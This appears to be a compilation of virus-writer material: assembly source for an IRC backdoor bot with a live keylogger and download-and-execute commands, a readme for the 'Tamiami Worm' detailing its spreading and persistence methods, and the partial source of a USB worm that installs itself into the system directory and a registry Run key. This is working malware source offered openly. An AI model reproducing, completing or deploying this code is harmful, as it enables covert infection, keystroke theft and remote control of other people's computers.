[ReturnBuffer + ecx], 0d ;end of buffer? je GetMotd ;check next line inc ecx ;ecx + 1 jmp IsMotd ;check next position HaveMotd: ;now we can join invoke lstrcpy,\ ;copy JOIN to buffer SendBuffer,\ ;pointer "JOIN " ;join command invoke lstrcat,\ ;append the channel SendBuffer,\ ;pointer Channel ;channel name invoke lstrcat,\ ;append a space SendBuffer,\ ;pointer " " ;space invoke lstrcat,\ ;append the channel password SendBuffer,\ ;pointer ChannelPassword ;pass call SendLine ;send to server invoke lstrcpy,\ ;copy MODE to buffer SendBuffer,\ ;pointer "MODE " ;to set key invoke lstrcat,\ ;append channel SendBuffer,\ ;pointer Channel ;channel name invoke lstrcat,\ ;append key mode and secret SendBuffer,\ ;buffer " +nsk " ;no external message, secret, key invoke lstrcat,\ ;append the password aka key SendBuffer,\ ;pointer ChannelPassword ;the pass call SendLine ;send it to irc server RecvCommand: ;check if received line include a command call RecvLine ;get a line call HandlePing ;handle ping if it is mov ecx, 0 ;set counter to zero IsCommand: ;check if command cmp word [ReturnBuffer + ecx], CommandPrefix ;is command prefix? je HaveCommand ;then extract command cmp byte [ReturnBuffer + ecx], 0 ;is end of line? je RecvCommand ;then wait for next inc ecx ;increase counter by one jmp IsCommand ;check next position HaveCommand: ;extract command mov ebx, ReturnBuffer ;pointer to buffer add ebx, ecx ;add counter add ebx, 2d ;add length of command prefix invoke lstrcpy,\ ;add to command buffer CommandBuffer,\ ;pointer ebx ;points to command position call ExecuteCommand ;execute command jmp RecvCommand ;next command Exit: invoke WSACleanup ;cleanup the wsa invoke ExitProcess,\ ;exit program 0 ;exit code SendLine: ;this procedure sends a line to the irc server invoke lstrcat,\ ;append crlf to the send buffer SendBuffer,\ ;buffer CRLF ;10d, 13d invoke lstrlen,\ ;get length of buffer SendBuffer ;buffer invoke send,\ ;send this line dword [SocketDesc],\ ;socket descriptor SendBuffer,\ ;send this eax,\ ;length of buffer 0 ;no flags cmp eax, -1 ;succeddful? je Exit ;if not exit ret ;return to call RecvLine: ;this procedure receive a line from server mov dword [ReturnBuffer], 0 ;clear the buffer GetLine: ;recv until crlf invoke recv,\ ;receive a byte dword [SocketDesc],\ ;socket descriptor ByteBuffer,\ ;1 byte buffer 1d,\ ;get just one byte 0 ;no flags cmp eax, 0 ;error? je Exit ;if so, exit cmp byte [ByteBuffer], 10d ;arrived crlf? je HaveLine ;then return invoke lstrcat,\ ;append byte to buffer ReturnBuffer,\ ;pointer ByteBuffer ;the byte jmp GetLine ;receive next byte HaveLine: ;we have a line and can.. ret ;...return GenerateNickname: ;this procedure generates a random nick mov ecx, 0 ;clear counter GetByte: ;get a single byte invoke GetTickCount ;get the run time cmp al, 97d ;after "a" jnb CheckBelow ;if so, check if its before "z" jmp Sleep33 ;sleep 33 ms CheckBelow: cmp al, 122d ;before "z" jna HaveByte ;then save byte jmp Sleep33 ;sleep 33 ms HaveByte: ;save a byte mov byte [RandomString + ecx], al ;save byte at the position inc ecx ;ecx + 1 cmp ecx, 4d ;got 4 bytes? je GenerateIt ;now generate it Sleep33: ;sleep 33ms and try again to get a byte a - z push ecx ;push counter invoke Sleep,\ ;sleep 33d ;33ms pop ecx ;restore counter jmp GetByte ;try to get a byte a -z GenerateIt: ;have random string, now create nick invoke GetUserName,\ ;get the logged on user name Username,\ ;pointer to buffer UsernameSize ;size of buffer cmp eax, 0 ;successful? jne ExtractUserName ;if so jump there mov dword [Username], "rrlf" ;no user name got, fill it with text anyways ExtractUserName: ;get 4 bytes from the user name mov byte [Username + 4d], 0 ;set string end at 5th position invoke lstrcpy,\ ;copy username to nick buffer Nickname,\ ;pointer to buffer Username ;pointer to buffer invoke lstrcat,\ ;append random string Nickname,\ ;to this RandomString ;from this invoke CharLowerBuff,\ ;now mae nick to lower Nickname,\ ;the nick 8d ;length ret ;return to call HandlePing: ;this procedure handle ping and pong cmp dword [ReturnBuffer], "PING" ;is a ping? jne NoPing ;if not return invoke lstrcpy,\ ;copy ping message to buffer PongBuffer,\ ;to this ReturnBuffer + 6d ;sendbuffer + "PING " invoke lstrcpy,\ ;copy PONG message to sendbuffer SendBuffer,\ ;buffer Pong ;pong message call SendLine ;send pong NoPing: ;its not a ping ret ;return SendPrivmsg: ;send a message to channel invoke lstrcpy,\ ;copy PRIVMSG to send buffer SendBuffer,\ ;pointer "PRIVMSG " ;irc command invoke lstrcat,\ ;append channel SendBuffer,\ ;pointer Channel ;the chan invoke lstrcat,\ ;append space SendBuffer,\ ;pointer " :" ;sepertor invoke lstrcat,\ ;append message SendBuffer,\ ;pointer ReturnBuffer ;pointer call SendLine ;send to server ret ;return ExecuteCommand: ;execute received command cmp dword [CommandBuffer], "unlo" ;is unlock command? je CmdUnlock ;execute it cmp byte [IsLocked], 0 ;is bot locked? je BotLocked ;jmp there cmp dword [CommandBuffer], "cmds" ;is commands command? je CmdCmds ;then show commands cmp dword [CommandBuffer], "lock" ;is lock command? je CmdLock ;lock it then cmp dword [CommandBuffer], "quit" ;is quit command? je CmdQuit ;quit from irc, exit cmp dword [CommandBuffer], "raw " ;is raw command? je CmdRaw ;execute raw irc command cmp word [CommandBuffer], "dl" ;is download command? je CmdDl ;download file from http cmp dword [CommandBuffer], "exec" ;is execute command? je CmdExec ;then execute application cmp dword [CommandBuffer], "vers" ;is version command? je CmdVersion ;show it then cmp dword [CommandBuffer], "msgb" ;is msgbox command? je CmdMsgbox ;show it then cmp dword [CommandBuffer], "info" ;is info command? je CmdInfo ;then show informations about victim cmp dword [CommandBuffer], "live" ;is livelog command? je CmdLivelog ;log it then cmp dword [CommandBuffer], "stop" ;is stoplog command? je CmdStoplog ;stop it then invoke lstrcpy,\ ;unknown command ReturnBuffer,\ ;pointer "unknown command, type 'cmds' for commands" ;mesage call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return BotLocked: invoke lstrcpy,\ ;copy locked message to return buffer ReturnBuffer,\ ;pointer "bot is locked, use unlock <password>" ;message call SendPrivmsg ;send it jmp ExecuteCommandReturn ;return CmdUnlock: ;unlock command invoke lstrlen,\ ;get password len BotPassword ;of this inc eax ;eax + 1 invoke lstrcpyn,\ ;copy password to parameter1 buffer Parameter1,\ ;pointer CommandBuffer + 7d,\ ;skip "unlock " eax ;dont copy the crlf invoke lstrcmp,\ ;compare password BotPassword,\ ;password Parameter1 ;received password cmp eax, 0 ;right pass? jne WrongPassword ;if not send back wrong pass mov byte [IsLocked], 1d ;set unlock code invoke lstrcpy,\ ;tell user bot is unlocked ReturnBuffer,\ ;buffer "bot now unlocked" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return WrongPassword: invoke lstrcpy,\ ;copy wrong pass message ReturnBuffer,\ ;pointer "wrong password" ;message call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return CmdCmds: ;show all comands invoke lstrcpy,\ ;copy unlock command ReturnBuffer,\ ;pointer to buffer "unlock <password> - unlock the bot" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy lock command ReturnBuffer,\ ;pointer to buffer "lock - lock the bot" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy raw command ReturnBuffer,\ ;pointer to buffer "raw <irc command> - send irc command to server" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy dl command ReturnBuffer,\ ;pointer to buffer "dl <http url> | <save as path> - download file from http" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy exec command ReturnBuffer,\ ;pointer to buffer "exec <path> - execute a application" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy msgbox command ReturnBuffer,\ ;pointer to buffer "msgbox <title> | <message> - show fake error message" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy info command ReturnBuffer,\ ;pointer to buffer "info - get username, system directory and is admin" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy livelog command ReturnBuffer,\ ;pointer to buffer "livelog - start logging keys and send it to channel" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy stoplog command ReturnBuffer,\ ;pointer to buffer "stoplog - stop logging keys" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy cmds command ReturnBuffer,\ ;pointer to buffer "cmds - show available commands" ;message call SendPrivmsg ;send it to channel invoke lstrcpy,\ ;copy version command ReturnBuffer,\ ;pointer to buffer "version - show bot version" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec invoke lstrcpy,\ ;copy quit command ReturnBuffer,\ ;pointer to buffer "quit - quit bot" ;message call SendPrivmsg ;send it to channel invoke Sleep,\ ;sleep a second 1000d ;1 sec jmp ExecuteCommandReturn ;return CmdLock: ;lock command mov byte [IsLocked], 0 ;set it as locked invoke lstrcpy,\ ;return message ReturnBuffer,\ ;buffer "bot now locked" ;message call SendPrivmsg ;send it jmp ExecuteCommandReturn ;and return CmdQuit: ;quit bot invoke lstrcpy,\ ;copy QUIT to buffer SendBuffer,\ ;pointer "QUIT" ;quit command call SendLine ;send it invoke Sleep,\ ;sleep 2000d ;2 seconds jmp Exit ;exit bot CmdRaw: ;send raw command to irc server invoke lstrcpy,\ ;copy command to buffer SendBuffer,\ ;buffer CommandBuffer + 4 ;skip "raw " call SendLine ;send it jmp ExecuteCommandReturn ;return CmdDl: ;download file via http call ExtractParameters ;get the two parameters invoke InternetOpen,\ ;initialise wininet Parameter1,\ ;use url as agent, not necessary 0,\ ;get configs from registry (INTERNET_OPEN_TYPE_PRECONFIG) 0,\ ;no proxy 0,\ ;also no bypass 0 ;no flags cmp eax, 0 ;error? je DownloadFileError ;if so jump to error mov dword [InetHandle], eax ;save handle invoke InternetOpenUrl,\ ;open the http url dword [InetHandle],\ ;handle from internetopen Parameter1 + 3,\ ;pointer to the url, pass "dl " 0,\ ;no need for headers 0,\ ;so are the length 0,\ ;no specific flags 0 ;no context needed cmp eax, 0 ;error? je DownloadFileError ;then show error mov dword [UrlHandle], eax ;save handle invoke CreateFile,\ ;create the file for writing Parameter2,\ ;pointer to filename GENERIC_WRITE,\ ;we just want to write FILE_SHARE_WRITE,\ ;write it 0,\ ;security attributes, nohh CREATE_NEW,\ ;fail if file exist FILE_ATTRIBUTE_HIDDEN,\ ;make it as hidden 0 ;no template file cmp eax, 0 ;error? je DownloadFileError ;send error back mov dword [FileHandle], eax ;save handle inc dword [ReadNext] ;increase readnext by one ReadNextBytes: ;read bytes by bytes cmp dword [ReadNext], 0 ;no more to read je DownloadComplete ;then download complete invoke InternetReadFile,\ ;read from the open url dword [UrlHandle],\ ;open handle DownloadBuffer,\ ;pointer to buffer 1024d,\ ;bytes to read, kbyte by kbyte ReadNext ;how much bytes readed? invoke WriteFile,\ ;write bytes to file dword [FileHandle],\ ;open handle DownloadBuffer,\ ;point to downloaded bytes dword [ReadNext],\ ;write that much bytes BytesWritten,\ ;how much bytes are written 0 ;no overlapped jmp ReadNextBytes ;process next bytes DownloadComplete: ;download is complete invoke CloseHandle,\ ;close file dword [FileHandle] ;via handle invoke InternetCloseHandle,\ ;close inet dword [UrlHandle] ;via handle invoke InternetCloseHandle,\ ;again dword [InetHandle] ;via handle invoke lstrcpy,\ ;copy success message ReturnBuffer,\ ;to return buffer "download successful" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return DownloadFileError: invoke lstrcpy,\ ;copy fail message ReturnBuffer,\ ;to return buffer "download failed" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return CmdExec: ;execute a file invoke lstrlen,\ ;get length of buffer CommandBuffer ;of this mov byte [CommandBuffer + eax - 1], 0 ;clear the crlf invoke CreateProcess,\ ;via create process CommandBuffer + 5d,\ ;application, skip "exec " CommandBuffer + 5d,\ ;user 0,\ ;no process attributes 0,\ ;no thread attributes 0,\ ;no inerhits CREATE_NEW_CONSOLE,\ ;own process 0,\ ;no environment 0,\ ;nor current directory StartupInfo,\ ;startup structure ProcessInfo ;process structure cmp eax, 0 ;error? je ExecError ;show it then invoke lstrcpy,\ ;copy message ReturnBuffer,\ ;to this "successful executed" ;yehaw call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return ExecError: ;error occured invoke lstrcpy,\ ;copy message ReturnBuffer,\ ;to this "execution failed" ;damn call SendPrivmsg ;send to chan jmp ExecuteCommandReturn ;return CmdVersion: ;show bot version invoke lstrcpy,\ ;copy version to buffer ReturnBuffer,\ ;pointer Version ;from version call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;return CmdMsgbox: ;show a error message box call ExtractParameters ;get two parameters invoke MessageBox,\ ;show messagbox, local 0,\ ;no owner Parameter2,\ ;Text Parameter1 + 7d,\ ;title, skip "msgbox " MB_ICONERROR ;error style invoke lstrcpy,\ ;copy message ReturnBuffer,\ ;pointer "message box closed by user" ;message call SendPrivmsg ;send to channeö jmp ExecuteCommandReturn ;return CmdInfo: ;show informations invoke lstrcpy,\ ;copy "Username" to buffer ReturnBuffer,\ ;pointer "Username: " ;msg invoke GetUserName,\ ;get user name Username,\ ;buffer UsernameSize ;size invoke lstrcat,\ ;copy username ReturnBuffer,\ ;buffer Username ;pointer invoke lstrcat,\ ;copy "sysdir" ReturnBuffer,\ ;to buffer ", System directory: " ;msg invoke GetSystemDirectory,\ ;get sys dir to test SystemDir,\ ;buffer 256d ;size invoke lstrcat,\ ;copy to buffer ReturnBuffer,\ ;to buffer SystemDir ;from here invoke lstrcat,\ ;append "admin" ReturnBuffer,\ ;buffer ", Admin: " invoke lstrcat,\ ;append filename to system dir SystemDir,\ ;to buffer "DiA.RRLF" ;filename ;) invoke CreateFile,\ ;try to create this file SystemDir,\ ;file in system directory GENERIC_WRITE,\ ;check write FILE_SHARE_WRITE,\ ;yeh 0,\ ;no security attributes CREATE_ALWAYS,\ ;overwrite if exist FILE_ATTRIBUTE_HIDDEN,\ ;as hidden 0 ;no template file cmp eax, -1 ;error? je NoAdmin ;then user is no admin invoke lstrcat,\ ;copy "yes" ReturnBuffer,\ ;to buffer "Yes" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;and return NoAdmin: ;user is no admin invoke lstrcat,\ ;copy "no" ReturnBuffer,\ ;to buffer "No" ;message call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;and return CmdLivelog: ;create a thread for live keylogging invoke CreateThread,\ ;create the keylog thread 0,\ ;no security attributes 0,\ ;default stack size LiveKeylog,\ ;procedure start 0,\ ;no parameters 0,\ ;start right now ThreadId ;store here the thread id cmp eax, 0 ;error? je ThreadError ;then jump there mov dword [ThreadHandle], eax ;store thread handle invoke lstrcpy,\ ;copy success message ReturnBuffer,\ ;to the buffer "live keylogging thread created" ;yehaw call SendPrivmsg ;send to channel jmp ExecuteCommandReturn ;ret ThreadError: invoke lstrcpy,\ ;copy error message ReturnBuffer,\ ;to this "error on creating live keylogging thread" ;buh call SendPrivmsg ;send it jmp ExecuteCommandReturn ;return CmdStoplog: ;stop keylogging thread invoke GetExitCodeThread,\ ;get exit code to terminate thread dword [ThreadHandle],\ ;thread handle ThreadExitCode ;store it here invoke TerminateThread,\ ;exit it now dword [ThreadHandle],\ ;handle dword [ThreadExitCode] ;with this cmp eax, 0 ;error? je ExitThreadError ;show it then mov dword [ThreadId], 0 ;clear id mov dword [ThreadHandle], 0 ;clear handle mov dword [ThreadExitCode], 0 ;clear exit code invoke lstrcpy,\ ;copy sucess message ReturnBuffer,\ ;to buffer "keylogging thread terminated" ;msg call SendPrivmsg ;send it jmp ExecuteCommandReturn ;ret ExitThreadError: ;arghh, maybe not exist invoke lstrcpy,\ ;copy error message ReturnBuffer,\ ;to buffer "error terminating keylogging thread" ;msg call SendPrivmsg ;send it jmp ExecuteCommandReturn ;ret ExecuteCommandReturn: ;return ret ;return to call ExtractParameters: ;this procedure extracts two parameter from a cmd mov edx, CommandBuffer ;pointer to buffer mov ecx, 0 ;zero counter FindCut: ;get the "|" cur cmp byte [edx + ecx], "|" ;is byte at position a "|"? je HaveCut ;then extract it inc ecx ;counter + 1 jmp FindCut ;scan next position HaveCut: ;have cut, extract it add edx, ecx ;add counter to start of buffer mov byte [edx - 1], 0 ;zero the "|" add edx, 2d ;skip space invoke lstrcpy,\ ;copy parameter2 Parameter2,\ ;destination edx ;source invoke lstrlen,\ ;get length to erase crlf Parameter2 ;of buffer mov byte [Parameter2 + eax - 1], 0 ;erase crlf invoke lstrcpy,\ ;copy parameter1 Parameter1,\ ;buffer CommandBuffer ;source ret ;return to call LiveKeylog: ;this procedure logs keys and send it to channel invoke lstrlen,\ ;get legth of buffer KeylogBuffer ;key strokes buffer cmp eax, 50d ;is over 50 characters? jae SendKeyLine ;then send it to channel mov ebx, 0 ;set counter to zero (just use ebx because api dont change it NextKey: ;try if next key is pressed cmp ebx, 255d ;end of possible keys? je LiveKeylog ;the try from start again invoke GetAsyncKeyState,\ ;get status of this key ebx ;in ebx (0 - 255) cmp eax, -32767d ;is pressed? jne ScanNextKey ;if not check next possible key cmp ebx, 20h ;VK_SPACE je IsSpace ;if it is this key, jump there cmp ebx, 8h ;VK_BACK je IsBack ;if it is this key, jump there cmp ebx, 9h ;VK_TAB je IsTab ;if it is this key, jump there cmp ebx, 60h ;VK_NUMPAD0 je IsNumpad0 ;if it is this key, jump there cmp ebx, 61h ;VK_NUMPAD1 je IsNumpad1 ;if it is this key, jump there cmp ebx, 62h ;VK_NUMPAD2 je IsNumpad2 ;if it is this key, jump there cmp ebx, 63h ;VK_NUMPAD3 je IsNumpad3 ;if it is this key, jump there cmp ebx, 64h ;VK_NUMPAD4 je IsNumpad4 ;if it is this key, jump there cmp ebx, 65h ;VK_NUMPAD5 je IsNumpad5 ;if it is this key, jump there cmp ebx, 66h ;VK_NUMPAD6 je IsNumpad6 ;if it is this key, jump there cmp ebx, 67h ;VK_NUMPAD7 je IsNumpad7 ;if it is this key, jump there cmp ebx, 68h ;VK_NUMPAD8 je IsNumpad8 ;if it is this key, jump there cmp ebx, 69h ;VK_NUMPAD9 je IsNumpad9 ;if it is this key, jump there cmp ebx, 0Dh ;VK_RETURN je IsReturn ;if it is this key, jump there cmp ebx, 30h ;VK_0 jae CheckIsKey ;if its above "1" its possible key ScanNextKey: ;check next key if its pressed inc ebx ;increase counter by one jmp NextKey ;check it baby CheckIsKey: cmp ebx, 5Ah ;VK_Z jbe IsKey ;is key from 1 - Z jmp ScanNextKey ;nop, scan next one IsSpace: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ " " jmp LiveKeylog IsBack: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "{back}" jmp LiveKeylog IsTab: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "{tab}" jmp LiveKeylog IsNumpad0: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "0" jmp LiveKeylog IsNumpad1: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "1" jmp LiveKeylog IsNumpad2: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "2" jmp LiveKeylog IsNumpad3: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "3" jmp LiveKeylog IsNumpad4: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "4" jmp LiveKeylog IsNumpad5: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "5" jmp LiveKeylog IsNumpad6: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "6" jmp LiveKeylog IsNumpad7: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "7" jmp LiveKeylog IsNumpad8: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "8" jmp LiveKeylog IsNumpad9: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "9" jmp LiveKeylog IsReturn: ;cat other key to buffer invoke lstrcat,\ KeylogBuffer,\ "{crlf}" jmp LiveKeylog IsKey: ;cat key to buffer mov dword [ByteBuffer], ebx ;key is in ebx invoke lstrcat,\ ;append it to the keylog buffer KeylogBuffer,\ ;to this ByteBuffer ;the logged key jmp LiveKeylog ;log next key SendKeyLine: invoke lstrcpy,\ ;send complete line to channel SendBuffer,\ ;copy to send buffer "PRIVMSG " ;irc command invoke lstrcat,\ ;append channel SendBuffer,\ ;to buffer Channel ;this invoke lstrcat,\ ;cat : SendBuffer,\ ;to buffer " :" ;guess invoke lstrcat,\ ;append logged buffer SendBuffer,\ ;to send buffer KeylogBuffer ;from here call SendLine ;send line to irc server mov dword [KeylogBuffer], 0 ;empty buffer jmp LiveKeylog ;log next ret ;return to call section '.idata' import data readable writeable ;imports library kernel, "kernel32.dll",\ winsock, "ws2_32.dll",\ user, "user32.dll",\ advapi, "advapi32.dll",\ wininet, "wininet.dll" import kernel,\ lstrcpy, "lstrcpyA",\ lstrcpyn, "lstrcpynA",\ lstrcat, "lstrcatA",\ lstrcmp, "lstrcmpA",\ lstrlen, "lstrlenA",\ GetTickCount, "GetTickCount",\ Sleep, "Sleep",\ CreateFile, "CreateFileA",\ WriteFile, "WriteFile",\ CloseHandle, "CloseHandle",\ CreateProcess, "CreateProcessA",\ CreateThread, "CreateThread",\ GetExitCodeThread, "GetExitCodeThread",\ TerminateThread, "TerminateThread",\ GetSystemDirectory, "GetSystemDirectoryA",\ ExitProcess, "ExitProcess" import winsock,\ WSAStartup, "WSAStartup",\ socket, "socket",\ inet_addr, "inet_addr",\ htons, "htons",\ connect, "connect",\ recv, "recv",\ send, "send",\ WSACleanup, "WSACleanup" import advapi,\ GetUserName, "GetUserNameA" import user,\ CharLowerBuff, "CharLowerBuffA",\ MessageBox, "MessageBoxA",\ GetAsyncKeyState, "GetAsyncKeyState" import wininet,\ InternetOpen, "InternetOpenA",\ InternetOpenUrl, "InternetOpenUrlA",\ InternetReadFile, "InternetReadFile",\ InternetCloseHandle, "InternetCloseHandle"

sources

Tamiami Worm 1.3 DiA ____________________________________________________________________________________________ \\ // // \\ \\ Tamiami Worm // // Version 1.3 \\ \\ coded by // // DiA \\ \\ Ready Rangers Liberation Front // // DiA_hates_machine@gmx.de - http://www.vx-dia.de.vu/ \\ \\ // //________________________________________________________________________________________\\ // Disclaimer I am not responsible for anything that you do with this source. So take care when you want to test this or parts of this code. If you don't know how to handle malware, please close this for your and others pleasure. // Intro Welcome to my best and biggest creation. It spreads via several ways, wich i describe here. Also it has some nice features, and still more to come. When you look at the source code, you will see that some functions are not used. Thats because i decided that simpler is better for this worm. As example the autostart function, in the first version of Tamiami it was able to infect an autostart application. But now it has a tool included that make termination of the worm harder, but read later about it. I am sure I will make some more versions of the worm, because I have still much ideas. // HTTP Server The worm has it's own HTTP server, that can provide a website at the infected computer. The HTTP server is used for mail spreading via a spoofed link, and spreading via IRC and mIRC. Read on for that. // Website creator Yes, thats right, the worm creates a website on an infected computer. For that it get's three pictures from user's "My Pictures" folder. It then creates HTML code that contain the pictures, sublinks to enlarge it, and a link to the worm binary, tarned as an selfextracting archive, containing more pictures. // Mail spreading via spoofed link The worm has now only mail spreading via simple MAPI (SMTP version in progress). The worm send's a mail with the spoofed link to an infecting computer (where the website is) to all mail addresses that can be found in the inbox of Outlook. // Spoofed link Tamiami send's only spoofed links (Mail, IRC, mIRC). The IP of the infected machine is spoofed by the http://user:pass@IP(in %hex) formation. // Mail spreading via attachment If mail spreading via spoofed link failed (eg can't run HTTP server), the worm send's mails to all addresses in inbox of Outlook with a binary of the worm attached. // Disabling MAPI warning For sending mail's without a warning by Outlook the worm disables it via an entry in the registry. // Extract mail addresses The worm read's mail addresses from the Outlook inbox and store the addresses as files in a folder. Why that? If you do it via files, you have no victim address twice, and invalid file names mean invalid mail addresses. // Two languages The worm is able to spread via two languages, german if system is a german one, otherwise english. Spreads via two languages in mail spreading, zip & rar spreading, also it creates website and spoofed links in two languages. // Autostart As I sayed in the intro, the worm has a simple autostart, via a entry in the registry. Other functions for autostart can be found in the documentation. // Creating a mutex To not run twice the worm creates a mutex. Before it do it's action it checks if the mutex already exist, if so the worm terminate it's process, because it already run. // Update Tamiami The worm is able to update itself, if a newer version come to system, and an older already exist, the worm update itself on it. // Disabling XP firewall The firewall that comes with XP SP2 will be disabled by the worm, via an entry in the registry. // Drive spreading The worm checks every drive from B:\ to Z:\ if it's a remote drive (fixed share). If so it copy's the worm binary with a random name. // RAR & ZIP worm Tamiami search on all fixed drives (remote or local) for all ZIP and RAR archives. If it found one, the worm add's itself with an random name to the archive. // IRC spreading Tamiami connects to 6 of the biggest IRC server and join channels with much people inside and idle there. It recocnize when a user join a channel, and then it send's a private message with a spoofed link to the infected PC and it's website. If worm get's kicked or banned it joins a new channel and spreads there. // mIRC spreading When mIRC is running the worm loads a script dynamicly into mIRC. The script spread the worm binary via DCC when someone join a channel. // IRC backdoor Inside the worm there is also an IRC backdoor, not for criminal intend, but maybe to clean infected machines if this worm is outbreak. The bot only have raw, quit, version and download and execute commands. // DOC infection The worm drop's a .vbs file that insert code in Word's Normal.dot template, that code infects every opened .doc file with a small dropper code and the worm binary. // Take car for me To avoid termination, the worm drop's my tool "TakeCareOnMe" to disk, and execute it with the worm path as parameter. That way, it restart's Tamiami when it got's terminated. // Payload The payload activte on September 17 every year. Then it prints random text with random color and random position to the screen. The loop is infinite, so very annoying. And if worm is terminated, it get restarted by TakeCareOnMe. // Outro Hope that "read me" covers all features of the worm, to get an closer look you can look at the big documentation "_Ver_Inc_Docu.h". I am sure in near or far future you will see a newer version of this worm. So long, have fun with this code. DiA/RRLF - 16.06.2006

sources

Win32.USBug DiA ; Win32.USBug - A simple USB Worm ; by DiA/RRLF ; http://www.vx-dia.de.vu ; DiA_hates_machine@gmx.de ; ; Alot of comments, pretty much self explaining, have fun with this little fucker. include "%fasminc%\win32ax.inc" ;common stuff section "usbug" code readable writeable executable ;just one section invoke GetModuleFileName,\ ;get our path 0,\ ;this module OurPath,\ ;store it here 256d ;size of buffer invoke GetSystemDirectory,\ ;get system directory SystemDir,\ ;buffer 256d ;size of buffer mov eax, dword [OurPath + 5d] ;get a dword of the string in eax (c:\wINDOws\system32\usbug.exe) mov ebx, dword [SystemDir + 5d] ;get also a dword in ebx (c:\wINDOws\system32) cmp eax, ebx ;check if same je GetWatchDrive ;then skip installation xor ecx, ecx ;clear counter GetPathEnd: ;get the end of the system path cmp byte [SystemDir + ecx], 0 ;check for terminating zero je HavePathEnd ;if so we found end of string inc ecx ;inc counter jmp GetPathEnd ;check next place HavePathEnd: ;append our installation name mov dword [SystemDir + ecx], "\usb" ;dword for dword mov dword [SystemDir + ecx + 4d], "ug.e";no need for api here mov word [SystemDir + ecx + 8d], "xe" ;now we have full path add ecx, 10d ;update counter push ecx ;save counter to stack invoke CopyFile,\ ;copy to system directory OurPath,\ ;from here SystemDir,\ ;to system directory (contains full path) 0 ;overwrite if we are already there pop ecx ;get counter from stack mov ebx, ecx ;save counter for registry use in ebx mov byte [OurPath + ecx], 0 ;set terminating zero to string, ecx is zero after copying bytes mov esi, SystemDir ;source index is system dir buffer, counter is in ecx mov edi, OurPath ;destination is our path buffer rep movsb ;move ecx bytes from esi to edi invoke RegOpenKeyEx,\ ;open registry key HKEY_LOCAL_MACHINE,\ ;write in this key RegRunKey,\ ;write to this autostart subkey 0,\ ;reserved KEY_SET_VALUE,\ ;we wanna write a value RegHandle ;save handle here invoke RegSetValueEx,\ ;set our value dword [RegHandle],\ ;reg handle RegValueName,\ ;the value name, some fake of course 0,\ ;reserved REG_SZ,\ ;its a zero terminated string OurPath,\ ;full path ebx ;size of buffer (ex-counter) invoke RegCloseKey,\ ;close registry dword [RegHandle] ;via handle GetWatchDrive: ;get next free drive letter invoke GetLogicalDriveStrings,\ ;call API to get all drives as strings in AllDrives 105d,\ ;size of buffer (A:\0 = 4 bytes * 26 + terminating 0) AllDrives ;store it here mov bl, 67d ;store "C" in bl, thats where we start xor ecx, ecx ;clear counter cmp byte [AllDrives], 65d ;check if we start at A:\ jne FindWatchDrive ;if not start checking add ecx, 4d ;if there is a A:\ skip it cmp byte [AllDrives + ecx], 66d ;is there also a B:\ jne FindWatchDrive ;no, we are at C:\, start checking add ecx, 4d ;if there is a B:\ skip this, we are now at C:\ FindWatchDrive: ;find the drive where usb sticks can be plugged cmp word [AllDrives + ecx], 00d ;we are at string end? then usb drive is last available + 1 je FoundEnd ;we are at the end cmp byte [AllDrives + ecx], bl ;is there a clean chain like C D E F G ... jne FoundWatchDrive ;no? then we found the usb drive in the middle inc bl ;check next character add ecx, 4d ;skip C:\0 for example jmp FindWatchDrive ;and check next string FoundWatchDrive: ;usb drive is in the middle mov bl, byte [AllDrives + ecx] ;get drive AFTER the space dec bl ;dec it, so we have the usb drive mov byte [WatchDrive], bl ;store it jmp WaitForUsb ;skip FoundEnd: ;lets get last drive from end of string sub ecx, 4d ;set counter to last available drive mov bl, byte [AllDrives + ecx] ;get last available drive letter inc bl ;inc it, so we have the usb drive mov byte [WatchDrive], bl ;store it WaitForUsb: ;now lets wait until a usb stick is plugged mov dword [UsbFile], "driv" ;set filename dword by dword mov dword [UsbFile + 4d], "er.e" ;no api here too mov word [UsbFile + 8d], "xe" ;now we have a full path in WatchDrive mov byte [UsbFile + 10d], 0 ;terminating null DropToUsb: ;try to copy ourself on the drive + filename invoke CopyFile,\ ;copy file OurPath,\ ;from system directory WatchDrive,\ ;to the possible usb stick (O:\driver.exe as example) 